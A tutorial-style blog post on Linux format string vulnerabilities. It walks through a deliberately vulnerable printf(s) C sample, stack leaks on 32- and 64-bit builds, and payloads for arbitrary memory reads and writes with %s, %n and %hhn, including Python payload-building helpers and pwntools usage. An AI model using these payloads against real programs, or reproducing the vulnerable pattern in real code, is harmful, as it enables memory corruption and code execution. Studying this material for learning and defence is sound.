Linux format string vulnerability

Posted by cherubrock74 on Fri, 04 Feb 2022 13:15:19 +0100

Format string vulnerability

Introduction to format strings

Common format string functions

Function    Description
printf      Writes formatted output to stdout
fprintf     Writes formatted output to the specified FILE stream
vprintf     Writes formatted output to stdout, taking the arguments as a va_list
vfprintf    Writes formatted output to the specified FILE stream, taking the arguments as a va_list
sprintf     Writes formatted output to a string
snprintf    Writes at most the specified number of bytes of formatted output to a string
vsprintf    Writes formatted output to a string, taking the arguments as a va_list
vsnprintf   Writes at most the specified number of bytes of formatted output to a string, taking the arguments as a va_list

Common form of a format specifier

%[parameter][flags][field width][.precision][length]type
  • parameter: n$, selects the n-th argument after the format string
  • field width: the minimum width of the output
  • precision: for a string, the maximum number of characters to output; for an integer, the minimum number of digits
  • length: the size of the argument
    • hh: one byte (char)
    • h: two bytes (short)
  • type
    • d/i: signed integer
    • u: unsigned integer
    • x/X: hexadecimal
    • o: octal
    • s: string; outputs the bytes at the address given by the argument, up to the terminating null byte
    • c: a single character of type char
    • p: void * type; outputs the value of the corresponding argument as a pointer. printf("%p", a) prints the value of variable a in address format, and printf("%p", &a) prints the address of variable a.
    • n: outputs nothing, but writes the number of characters successfully output so far to the variable pointed to by the corresponding integer pointer argument.
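The field layout above can be sketched as a small parser. This is only an illustration in Python, not how printf itself is implemented: the regular expression and the name parse_spec are assumptions made here, and only a handful of flags, length modifiers and types are recognized.

```python
import re

# Hypothetical helper: splits one conversion specification into the fields
# %[parameter][flags][field width][.precision][length]type
SPEC = re.compile(
    r"%(?:(?P<parameter>\d+)\$)?"   # n$  -> which argument to use
    r"(?P<flags>[-+ #0]*)"          # flags such as 0 or -
    r"(?P<width>\d+)?"              # minimum field width
    r"(?:\.(?P<precision>\d+))?"    # .precision
    r"(?P<length>hh|h|ll|l)?"       # size of the argument
    r"(?P<type>[diuxXoscpn])"       # conversion type
)

def parse_spec(spec: str) -> dict:
    """Return the named fields of a single conversion specification."""
    match = SPEC.fullmatch(spec)
    if match is None:
        raise ValueError(f"not a recognized conversion specification: {spec!r}")
    return match.groupdict()

print(parse_spec("%7$hhn"))  # parameter 7, length hh, type n
print(parse_spec("%08x"))    # flag 0, width 8, type x
```

Fields that are absent come back as None (or an empty string for flags), which makes it easy to see that %7$hhn carries a parameter index and a length but no width or precision.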

Principle verification

Sample program:

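#include <stdio.h>

int main(void) {
    /* Deliberately vulnerable: s is passed to printf as the format string,
       so each %p reads a parameter that was never supplied. */
    char s[100] = "aaaa.%p.%p.%p.%p.%p.%p.%p";
    printf(s);
    return 0;
}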

32-bit

Compile command:

gcc test.c -g -m32 -o test

Output result:

aaaa.0xf7ffc988.0xffffcf2a.0x56555595.0xffffcf2a.0xf7ffc984.0x61616161.0x2e70252e

Stack structure:

00:0000│ esp  0xffffcee0 —▸ 0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
01:0004│      0xffffcee4 —▸ 0xf7ffc988 (_rtld_global_ro+136) ◂— 0x8e
02:0008│      0xffffcee8 —▸ 0xffffcf2a ◂— 0x0
03:000c│      0xffffceec —▸ 0x56555595 (main+24) ◂— add    ebx, 0x1a3f
04:0010│      0xffffcef0 —▸ 0xffffcf2a ◂— 0x0
05:0014│      0xffffcef4 —▸ 0xf7ffc984 (_rtld_global_ro+132) ◂— 0x6
06:0018│ eax  0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'

From top to bottom, these are parameters 0 to 6. Parameter 0 is the address of the format string, and the first 4 bytes of the format string itself are read as parameter 6 (the exact index depends on the stack layout). Therefore, if a target address is placed at the right position in the format string, printf can be made to operate on the data at that address.
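Finding which parameter index lands on the format string can be automated from the leaked output. The following Python sketch takes the output shown above and looks for the word whose little-endian bytes start with the marker aaaa; the function name find_marker_offset is hypothetical, and the sketch assumes the leak uses "." as the separator, as in the sample program.

```python
def find_marker_offset(leak: str, marker: bytes = b"aaaa", word_size: int = 4):
    """Return the parameter index whose leaked word starts with `marker`."""
    fields = leak.split(".")[1:]  # field 0 is the echoed "aaaa" itself
    for index, field in enumerate(fields, start=1):
        try:
            value = int(field, 16)
        except ValueError:
            continue  # e.g. "(nil)", which glibc prints for a null pointer
        # The stack is little-endian, so convert the word back to raw bytes.
        if value.to_bytes(word_size, "little").startswith(marker):
            return index
    return None

output_32 = ("aaaa.0xf7ffc988.0xffffcf2a.0x56555595.0xffffcf2a."
             "0xf7ffc984.0x61616161.0x2e70252e")
print(find_marker_offset(output_32))  # 6
```

The same function works on a 64-bit leak when called with word_size=8, since only the first bytes of each word are compared against the marker.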

64-bit

Compile command:

gcc test.c -g -m64 -o test

Output result:

aaaa.0x7fffffffde78.0x70.0x555555554770.0x7ffff7dced80.0x7ffff7dced80.0x2e70252e61616161.0x70252e70252e7025

Registers:

 RAX  0x0
 RBX  0x0
 RCX  0x555555554770 (__libc_csu_init) ◂— push   r15
 RDX  0x70
 RDI  0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
 RSI  0x7fffffffde78 —▸ 0x7fffffffe21b
 R8   0x7ffff7dced80 (initial) ◂— 0x0
 R9   0x7ffff7dced80 (initial) ◂— 0x0
 R10  0x0
 R11  0x0
 R12  0x5555555545a0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffde70 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffdd90 —▸ 0x555555554770 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
 RIP  0x555555554747 (main+157) ◂— call   0x555555554580

Stack structure:

00:0000│ rdi rsp  0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
01:0008│          0x7fffffffdd28 ◂— '%p.%p.%p.%p.%p.%p'
02:0010│          0x7fffffffdd30 ◂— '.%p.%p.%p'
03:0018│          0x7fffffffdd38 ◂— 0x70 /* 'p' */
04:0020│          0x7fffffffdd40 ◂— 0x0

A 64-bit program passes the first six function parameters in the rdi, rsi, rdx, rcx, r8 and r9 registers, and any further parameters are pushed onto the stack in turn. rdi holds the address of the format string (parameter 0), so the first five %p outputs are the values of rsi, rdx, rcx, r8 and r9, and the first eight bytes of the format string on the stack are read as parameter 6.
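The mapping from parameter index to location can be written down directly. This Python sketch assumes the System V AMD64 calling convention used by Linux and the layout seen in the run above, where the stack parameters start at the value of rsp just before the call; arg_location is a hypothetical name used only for illustration.

```python
# System V AMD64: integer parameters 0-5 travel in these registers.
ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def arg_location(index: int) -> str:
    """Where printf looks for parameter `index` (0 = the format string)."""
    if index < len(ARG_REGISTERS):
        return ARG_REGISTERS[index]
    # Remaining parameters sit on the stack, 8 bytes apart, starting at the
    # value of rsp just before the call instruction.
    return f"[rsp+{(index - len(ARG_REGISTERS)) * 8:#x}]"

for i in range(8):
    print(i, arg_location(i))

# Parameter 6 from the output above, turned back into the bytes it came from.
print((0x2e70252e61616161).to_bytes(8, "little"))  # b'aaaa.%p.'
```

Parameter 6 maps to [rsp+0x0], which matches the stack dump: the format string sits at rsp, so its first eight bytes are what %6$p prints.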

Leak memory

Leak stack variable memory

Leak the value of a stack variable

To get the value on the stack that is treated as the (n+1)-th parameter: %n$x

Note: %x is the hexadecimal counterpart of %d and corresponds to 32 bits, that is, 4 bytes. In a 64-bit program it shows only the low 32 bits of the value. %p always matches the pointer width of the system, so %p is recommended.
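The difference between %x and %p on a 64-bit value can be shown with plain integer arithmetic. This Python sketch only models the widths involved (a 32-bit unsigned int for %x, a full pointer for %p as glibc prints a non-null pointer); the function names are hypothetical.

```python
def as_percent_x(value: int) -> str:
    """What %x shows: the parameter read as a 32-bit unsigned int."""
    return format(value & 0xFFFFFFFF, "x")

def as_percent_p(value: int) -> str:
    """What %p shows for a non-null pointer: the full value with 0x prefix."""
    return hex(value)

leaked = 0x7fffffffde78  # rsi value from the 64-bit run above

print(as_percent_x(leaked))  # ffffde78
print(as_percent_p(leaked))  # 0x7fffffffde78
```

The upper half of the address is lost with %x, which is why a stack or libc address leaked that way cannot be reconstructed.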

Leak the contents of the address held in a stack variable

To get the contents of the address held in the value that is treated as the (n+1)-th parameter: %n$s

Leak arbitrary address memory

To get the contents at the address addr (where addr is read as the k-th parameter): addr%k$s
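A payload of the form addr%k$s can be assembled with the standard struct module. This is a minimal Python sketch for a 32-bit little-endian target; the address 0x0804a028 is a made-up example value, k=6 is the index found in the 32-bit run above, and leak_payload_32 is a hypothetical name.

```python
import struct

def leak_payload_32(addr: int, k: int) -> bytes:
    """Build addr%k$s for a 32-bit little-endian target."""
    packed = struct.pack("<I", addr)
    if b"\x00" in packed:
        # printf stops reading the format string at the first null byte,
        # so the %k$s after the address would never be processed.
        raise ValueError("address contains a null byte; place it after the specifier")
    return packed + f"%{k}$s".encode()

payload = leak_payload_32(0x0804a028, 6)  # hypothetical target address
print(payload)
```

When printf reaches %6$s it reads parameter 6, which is the packed address at the start of the format string, and prints the bytes stored there up to the next null byte.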

Overwrite memory

Note: %n writes through a pointer, so it can only overwrite the memory that an address points to, not the first few parameters themselves. For a program with ASLR enabled, a stack address must be leaked first before overwriting a value on the stack.

Generating a payload with pwntools

For format string payloads, pwntools also provides a class, FmtStr, that can be used directly. For details, see http://docs.pwntools.com/en/stable/fmtstr.html . The function used most often is

fmtstr_payload(offset, {address:data}, numbwritten=0, write_size='byte')
  • offset: the parameter index of the first part of the format string that you control
  • numbwritten: the number of characters that have already been output
  • write_size: the write granularity, one of byte, short or int, corresponding to hhn, hn and n. The default is byte, that is, writing with hhn.

Note: some challenges impose a time limit, which can make the payload generated by pwntools fail. In such cases the output length can usually be reduced by overwriting only the low bytes of the target value, and the payload then has to be constructed manually.

Manually construct a payload

Overwriting with a small number

For a number smaller than the machine word length, putting the address at the front of the format string means the number of characters already output exceeds the number to be written, so the address should be placed after the specifier instead.

Taking the number 2 as an example: aa%k$n[padding][addr]
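The layout aa%k$n[padding][addr] has one subtlety: k depends on how long the part before the address is, and that length in turn depends on the digits of k. The Python sketch below settles this by iterating. It assumes a 32-bit little-endian target whose format string starts at parameter fmt_offset (6 in the 32-bit run above); the function name and the address 0x0804a028 are hypothetical.

```python
import struct

WORD = 4  # bytes per stack slot on a 32-bit target

def small_write_payload(value: int, addr: int, fmt_offset: int) -> bytes:
    """Build aa...%k$n[padding][addr] so that `value` is written to `addr`."""
    k = fmt_offset
    for _ in range(8):  # k settles after a couple of rounds
        head = b"a" * value + f"%{k}$n".encode()
        padded_len = -(-len(head) // WORD) * WORD  # round up to a full slot
        needed = fmt_offset + padded_len // WORD   # slot where addr will land
        if needed == k:
            break
        k = needed
    else:
        raise ValueError("could not settle on a parameter index")
    # Padding comes after %n, so it no longer affects the written count.
    padding = b"x" * (padded_len - len(head))
    return head + padding + struct.pack("<I", addr)

print(small_write_payload(2, 0x0804a028, 6))
```

For the value 2 and fmt_offset 6 this yields aa%8$nxx followed by the packed address: parameters 6 and 7 are the eight bytes of aa%8$nxx, so the address is parameter 8.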

Overwriting with a large number

Outputting a very large number of characters in one go takes too long, so a large number has to be split into several parts that are written separately. For example, hhn writes one byte at a time and hn writes two bytes at a time.

Taking a 32-bit number written with hhn as an example, the payload has the form: [addr][addr+1][addr+2][addr+3][pad1]%k$hhn[pad2]%(k+1)$hhn[pad3]%(k+2)$hhn[pad4]%(k+3)$hhn
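The padding values in that form follow from the running character count: each %hhn stores only the low byte of the count, so each pad is the distance, modulo 256, from the current count to the next target byte. The Python sketch below works this out for a 32-bit little-endian target. The function name, the address 0x0804a028 and the value 0x12345678 are made up for illustration, the padding is emitted as %<n>c (which assumes the target's printf tolerates mixing numbered and unnumbered specifiers, as is common practice against glibc), and the addresses are assumed to contain no null or % bytes.

```python
import struct

def hhn_write_payload(addr: int, value: int, k: int) -> bytes:
    """[addr]..[addr+3] followed by one %<pad>c%<k+i>$hhn pair per byte.

    k is the parameter index at which the first address lands.
    """
    payload = b"".join(struct.pack("<I", addr + i) for i in range(4))
    written = len(payload)  # the four addresses are printed first (16 bytes)
    for i, byte in enumerate(struct.pack("<I", value)):
        pad = (byte - written) % 256  # %hhn keeps only the low byte of the count
        if pad:
            payload += f"%{pad}c".encode()
            written += pad
        payload += f"%{k + i}$hhn".encode()
    return payload

print(hhn_write_payload(0x0804a028, 0x12345678, 6))
```

For 0x12345678 the bytes are written in the order 0x78, 0x56, 0x34, 0x12, giving pads of 104, 222, 222 and 222, so fewer than 700 characters are output in total instead of the roughly 305 million a single %n would need.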
